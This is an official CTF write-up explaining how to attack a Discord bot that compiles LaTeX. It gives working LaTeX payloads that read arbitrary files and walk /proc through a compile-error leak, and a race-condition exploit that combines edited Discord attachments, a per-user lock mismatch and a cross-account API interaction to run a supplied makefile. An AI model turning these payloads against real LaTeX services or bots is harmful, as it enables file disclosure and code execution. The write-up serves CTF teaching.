# TSJ CTF 2022 - Remote Code TeXecution Official Write-up

This is a step-by-step tutorial of my challenge Remote Code TeXecution: Hack a Discord bot that processes $\LaTeX$ files.

It was originally a black-box challenge with two parts: the first part is to leak the source code, and the second part is to achieve code execution. Because few people were attempting it, I decided to release the source code after a few hours. The white-box version is a lot easier, and solving part 1 is no longer a prerequisite for solving part 2.

I released the challenge a bit too late (I was fixing issues involving asyncio and concurrent requests), and it would probably have had more solves (even as a black box) if I had released it earlier :/.

## Part 1: Leaking the source

- Intended difficulty: Medium
- Guessing required: A little (black-box); None (white-box)
- Solve count: 1

### How to read a file

We can make the bot render an arbitrary `.tex` file. Reading files in LaTeX is easy; in fact, many CTF contests already feature LaTeX challenges like this. However, there is a catch in this one: payloads containing backslash characters (and hence any TeX command) will not produce any output.

After some testing (or reading the code), we may observe that:

- If our file doesn't compile, the bot sends an error message.
- Otherwise, if our file contains a backslash, the bot tells us it's insecure.
- Otherwise, we see the rendered output.

There is a logic error: if we send a file with backslashes that doesn't compile, its error output still gets shown. This means that we can still use commands, but instead of using `\input` to leak information, we should print stuff to the error output.

One way to do this is to produce a custom error message with `\PackageError`. Another way relies on the fact that `pdflatex` prints errors to stdout in a special format, so we can do something like `\typeout{! abc}` to trick the bot into thinking that `abc` is an error.

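The order of those three checks is what makes the leak possible. Here is a minimal Python sketch of that ordering; it is a hypothetical model rather than the bot's actual code, and the function name `handle_document`, the `compiles` flag, and the returned strings are all assumptions made for illustration.

```python
def handle_document(source: str, compiles: bool, error_log: str = "") -> str:
    """Hypothetical model of the bot's checks, in the order observed above."""
    # 1. A failed compilation is reported first, before any filtering.
    if not compiles:
        return f"error: {error_log}"
    # 2. The backslash filter only applies to documents that compiled.
    if "\\" in source:
        return "insecure"
    # 3. Backslash-free documents that compile are rendered.
    return "rendered"


# A payload with commands that compiles cleanly is rejected...
print(handle_document(r"\input{/etc/passwd}", compiles=True))
# ...but the same kind of payload leaks through the error path if it fails to compile.
print(handle_document(r"\typeout{! leaked}\undefined", compiles=False, error_log="! leaked"))
```

Because the backslash check sits behind the compilation check, any payload that deliberately fails to compile never reaches the filter.
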
We may utilize TeX's powerful control flow to read a file like this:

```latex
\catcode0=10 % make \0 not produce a syntax error
\catcode9=11 % make \t indents work correctly
\def\n{/path/to/file}
\def\l{69}
\def\r{420}
\newread\file
\openin\file=\n
\newcounter{line}
\makeatletter
\@whilenum\value{line} < \r \do {
  \read\file to \fileline
  \stepcounter{line}
  \ifnum\value{line} > \l
    \typeout{! \fileline}
  \fi
}
```

The above payload makes the bot print lines 70 through 420 (counting from 1) of the file `/path/to/file`: the counter is incremented before the comparison with `\l`, so the first line printed is the one that brings the counter to 70. There are many other ways to do the same thing, and you can find them in other CTF write-ups.

### Which file to read?

Knowing how to get the contents of a file, all that remains is to determine the bot's file name. There are also many ways to do this, mostly using [procfs](https://wiki.archlinux.org/title/Procfs). For example,

1. We can brute-force the bot's PID: for each number `PID`, check if `/proc/{PID}/cmdline` exists and print it to see if it's the one we want.
2. We know that the bot must be an ancestor process of LaTeX, so we can read `/proc/self/status` to see its parent's PID, and read `/proc/{PPID}/status` to see the parent's PPID, and so on, until we reach the PID 1 process. One of them is the answer.

The second way can be done entirely in LaTeX:

```latex
% make '\t' a token, ignore '\r', and make '\0' a space
\catcode9=\active
\catcode13=14
\catcode0=10
\makeatletter
\newcommand\stripprefix[6]{}
% reads the parent pid of the argument and stores it in \@pid
\newcommand\getppid[1]{
  \openin\file=/proc/#1/status
  \@for\tmp:={1,2,3,4,5,6}\do {
    \read\file to\fileline
  }
  \read\file to\ppidline
  \def\@pid{\expandafter\stripprefix\ppidline}
  \closein\file
}
% prints /proc/\@pid/cmdline
\newcommand\print{
  \openin\file=/proc/\@pid/cmdline
  \read\file to\cmdline
  \typeout{! \unexpanded\expandafter{\cmdline}}
  \closein\file
}
\newread\file
\getppid{self}\print
\loop
  \getppid{\@pid}\print
\ifnum\@pid > 1
\repeat
```

The above yields the following (long lines are wrapped at 79 characters by `pdflatex`):

```
! /bin/sh -c pdflatex -no-shell-escape -jobname output __document.tex | awk '/^
! /,/^\?/'
! /usr/bin/make -s -C sandbox/ff8e8c9ec1904d9fc299_468420931812065281 -f makefi
le1 stage1
! /usr/bin/sudo -u latex /usr/bin/make -s -C sandbox/ff8e8c9ec1904d9fc299_46842
0931812065281 -f makefile1 stage1
! python3 /workdir/4sQ6xQxtIyLHwuLLjjME.py
! /bin/bash ./entrypoint.sh
) (./output.aux) )
No pages of output.
Transcript written on output.log.
Output PDF not found.
```

This means the bot's file is `/workdir/4sQ6xQxtIyLHwuLLjjME.py`.

## Part 2: Arbitrary code execution

- Intended difficulty: bruh
- Guessing required: A little
- Solve count: 0

### A race condition

The second part is not actually a LaTeX challenge, since I believe you cannot execute code with `-no-shell-escape`. As the hint suggests, we should probably upload/create our own makefile. Let's check the different ways this might be possible.

1. Use LaTeX's `\openout` to write a file. However, according to the manual:
    > If the file does not have an extension then TeX will add a `.tex`.

    So we can only create a `makefile.tex`, which doesn't work.
2. `/upload` a makefile. The bot checks file extensions, plus Discord replaces all special characters in filenames, so this doesn't work.
3. Upload a makefile using the direct message feature. Same as 2, it doesn't work. Unless...?

There is a TOCTOU bug in option 3: the bot checks the extension first, and then waits for the user to press the "Yes" button. We may edit the file between these events to circumvent the check. We can't edit message attachments in the Discord client, but it's a thing in the API (see [this](https://discord.com/developers/docs/resources/channel#edit-message) and [this](https://discord.com/developers/docs/reference#editing-message-attachments)), which means it's actually possible to upload a file with the name `makefile1` or `makefile2`.

### Another race condition

The next step is to prevent our makefile from getting overwritten immediately.

Let's analyze what the bot does after we select an option:

| User selects the option "White Text" for `foo.tex` |
| -------- |
| Bot downloads the attachment `foo.tex` |
| Bot creates the files `__document.tex` and `makefile2` |
| Bot runs `make -f makefile2 stage1` |
| Bot runs `make -f makefile2 stage2` |
| Bot sends output |

We may notice an exploitable race condition in this process. Consider what happens when a user sends two commands in quick succession, interleaved like this:

| User selects the option "White Text" for `foo.tex` | User selects the option "White Background" for `makefile2` |
| -------- | -------- |
| Bot downloads the attachment `foo.tex` | |
| Bot creates the files `__document.tex` and `makefile2` | |
| Bot runs `make -f makefile2 stage1` | |
| | <span style="color:red;">Bot downloads the attachment `makefile2`</span> |
| | Bot creates the files `__document.tex` and `makefile1` |
| | Bot runs `make -f makefile1 stage1` |
| <span style="color:red;">Bot runs `make -f makefile2 stage2`</span> | |
| | Bot runs `make -f makefile1 stage2` |
| | Bot sends output |
| Bot sends output | |

It runs the makefile we supplied! This requires all the files to be in the same working directory, so both commands must be issued by the same user.

Unfortunately, looking at the code, we can see that the procedure is protected by a mutex lock:

```python
lock = self.locks.get(interaction.user)
if lock == None:
    lock = self.locks[interaction.user] = asyncio.Lock()
async with lock:
    # ...
    # working dir is a hash of ctx.user.id
    await self.process_file(ctx.user.id, self.user_files[ctx.user], makefile)
    # ...
```

which means that our exploit won't work. Unless...?

### Discord, what the fuck?

Let's look more closely at the snippet above. The working directory and files depend on `ctx.user`, while the choice of mutex depends on `interaction.user`. Wait, that's not necessarily the same person!

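To see why that mismatch matters, here is a minimal `asyncio` sketch, assuming a simplified handler. The names `handle_select`, `issuer`, and `clicker`, the `sandbox/...` path format, and the sleep that stands in for the two `make` stages are all hypothetical and not taken from the bot.

```python
import asyncio

locks = {}   # one lock per *clicking* user, as in the snippet above
events = []  # records the order in which the handlers touch the directory


async def handle_select(issuer: str, clicker: str, label: str) -> None:
    # The lock is chosen by whoever clicked the select menu...
    lock = locks.setdefault(clicker, asyncio.Lock())
    async with lock:
        # ...but the working directory is chosen by whoever issued the command.
        workdir = f"sandbox/{issuer}"
        events.append(f"{label} start in {workdir}")
        await asyncio.sleep(0.05)  # stands in for `make stage1` and `make stage2`
        events.append(f"{label} end in {workdir}")


async def main() -> None:
    # Both selections belong to the same issuer but come from different clickers,
    # so they take different locks and overlap in the same directory.
    await asyncio.gather(
        handle_select("issuer", "issuer", "A"),
        handle_select("issuer", "other", "B"),
    )


asyncio.run(main())
print(events)
```

In this sketch, handler B starts working in the shared directory before handler A has finished. If both calls used the same `clicker`, the second handler would wait for the first to release the lock.
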
`ctx.user` is the user who used the `/render` command, and `interaction.user` is the user who clicked an option in the select menu.

Suppose there are two users `user1` and `user2`. When `user1` uses the `/render` command in a direct message, the bot sends this:

![](https://i.imgur.com/qfZzSpw.png)

Selecting an option is equivalent to sending an API request like this:

```sh
curl -X POST https://discord.com/api/v9/interactions \
  -H 'authorization: <user1 auth token>' \
  -H 'content-type: application/json' \
  -d "$payload"
```

where `payload` is:

```json
{
  "type": 3,
  "nonce": "...",
  "guild_id": "...",
  "channel_id": "...",
  "message_flags": 64,
  "message_id": "...",
  "application_id": "...",
  "session_id": "...",
  "data": {
    "component_type": 3,
    "custom_id": "...",
    "type": 3,
    "values": ["t"]
  }
}
```

and we get the desired output from the bot:

![](https://i.imgur.com/uEV4WTd.png)

Discord says "Only you can see this" under all messages, but is that true? Well, let's try sending the same API request as above but with `user2`'s token instead, and change the nonce to another random number. We get... `400 Bad Request {"message": "Unknown Channel", "code": 10003}`.

It says "Unknown Channel", so let's repeat this entire thing in some channel in the TSJ CTF server, which is visible to both users. This time we get... `204 No Content`???

This means that `user2` has successfully sent an interaction to `user1`'s command response without actually being able to see it. After sending the API request, `user2` can in fact see the output of `user1`'s file:

![](https://i.imgur.com/tU82dfd.png)

This shows that `ctx.user` and `interaction.user` in the previous section can indeed be two different people, thus enabling our race condition exploit.

To sum up, the full exploit is as follows:

1. `/upload` a file containing an infinite loop:
    ```latex
    \loop\iftrue\repeat
    ```
2. Send a direct message containing any `.tex` file.
3. Edit the message in step 2 to contain an attachment `makefile2` that says
    ```makefile
    stage2:
    	/readflag
    	sleep 8
    	rm -f output.png
    ```
4. `/render` in the TSJ CTF server and select "White Text".
5. Press the "Yes" button in the bot's reply in step 2.
6. Using another account's authorization token, select the "White Background" option in step 4.

Steps 4 to 6 have to be done within 10 seconds (before the infinite loop gets killed), and can be carried out either by hand or by using a script. Note that you should pause a bit between the steps because of latency.

## Conclusions

- LaTeX is weird.
- Python's `asyncio` is weird.
- Discord API is weird.